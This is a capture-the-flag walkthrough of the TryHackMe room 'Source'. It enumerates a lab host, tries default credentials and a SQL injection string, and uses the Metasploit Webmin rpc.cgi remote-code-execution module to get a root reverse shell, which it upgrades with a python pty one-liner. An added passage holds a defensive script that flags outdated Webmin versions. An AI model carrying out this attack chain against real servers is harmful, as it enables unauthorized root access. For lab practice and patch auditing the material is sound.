Difficulty: Easy
Room link: https://tryhackme.com/room/source
Hi all, it's F1ash, and this is the walkthrough for the TryHackMe room Source. This room is about exploiting a recent vulnerability in Webmin, a web-based system configuration tool.
So let's get started.
Machine IP: 10.10.159.186
Enumeration
I will use rustscan to enumerate the open ports and services, as one of its advantages is that it is faster than a traditional nmap scan. The command I used was
rustscan -a 10.10.159.186 -b 65535 -- -A
and the open ports are found to be 22 (SSH) and 10000 (MiniServ 1.890 (Webmin httpd)). So port 10000 is a Webmin port. Let's see if we can visit the Webmin page.
http://10.10.159.186:10000 gives an error as below:
It says that the web server is running in SSL mode. So let's try https://10.10.159.186:10000 instead. This time it displays a Webmin login page:
Exploit
I tried a few common default credentials like admin:admin, admin:password and root:root, but none worked. I tried simple SQLi payloads like 'or '1' = '1, but that didn't work. While trying, I landed on a page saying I had tried too many bad passwords and access was denied for my host. However, I was not locked out for long, and I was able to access the page again. This time I decided to look into the Webmin version information that we got from Nmap and see if there is an exploit available for that version.
Using searchsploit to find the exploit with searchsploit webmin 1.890 gives us a potential exploit we can use:
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) | linux/webapps/47330.rb
It seems there is a Metasploit exploit for the Webmin version that we have.
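Defender-side counterpart of the searchsploit step above, as an added example that is not part of the original walkthrough: a small Python check that pulls MiniServ/Webmin banners out of nmap-style service output and flags any version below 1.920, the cut-off named in the searchsploit entry. The scan lines, and the two extra hosts in them, are constructed for illustration.

```python
import re
from typing import List, Tuple

# Constructed sample of nmap -A service lines. The first two mirror the ports
# found in the walkthrough; the other hosts are invented to show non-flagged cases.
SCAN_LINES = """
10.10.159.186 22/tcp    open  ssh      OpenSSH
10.10.159.186 10000/tcp open  http     MiniServ 1.890 (Webmin httpd)
10.10.0.50    10000/tcp open  http     MiniServ 1.930 (Webmin httpd)
10.10.0.51    10000/tcp open  http     MiniServ 1.920 (Webmin httpd)
"""

# Searchsploit lists the module as "Webmin < 1.920", so 1.920 is the first
# version the entry does not claim to affect.
FIXED_VERSION = "1.920"

# host, port, and the MiniServ version string from an nmap service line
BANNER_RE = re.compile(
    r"^(\S+)\s+(\d+)/tcp\s+open\s+\S+\s+MiniServ\s+(\d+(?:\.\d+)*)"
)


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '1.890' into (1, 890) so versions compare numerically, not lexically."""
    return tuple(int(part) for part in text.split("."))


def find_outdated_webmin(scan_output: str, fixed: str = FIXED_VERSION) -> List[dict]:
    """Return one finding per MiniServ banner whose version is below `fixed`."""
    findings = []
    for line in scan_output.strip().splitlines():
        m = BANNER_RE.match(line)
        if not m:
            continue  # not a Webmin/MiniServ service line
        host, port, version = m.groups()
        if parse_version(version) < parse_version(fixed):
            findings.append({
                "host": host,
                "port": int(port),
                "version": version,
                "advice": f"upgrade Webmin to {fixed} or later",
            })
    return findings


if __name__ == "__main__":
    for finding in find_outdated_webmin(SCAN_LINES):
        print(finding)
```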
Let's open up Metasploit using msfconsole and find that exploit. We can do search 1.920 in Metasploit to get the exploit, and use the only exploit that we are able to find. Then, we can see the options with show options.
In the options, we will need to set LHOST to our attacking machine IP (set LHOST <attack_machine_ip>), RHOSTS to the victim machine IP and SSL to true, and then just run the exploit.
And it works, and we seem to have gotten a shell; in fact, it is a root shell! We can upgrade the shell using python -c "import pty; pty.spawn('/bin/bash');" and we see that we are actually root.
Since we are root, we can go ahead and get both the user.txt and root.txt flags. There is only one user directory in the home directory, dark, and it contains the user.txt flag. Similarly, we can get the root.txt flag from the /root directory. And that's it, that's all we needed!
Thanks to TryHackMe, and DarkStar1471 for creating this room!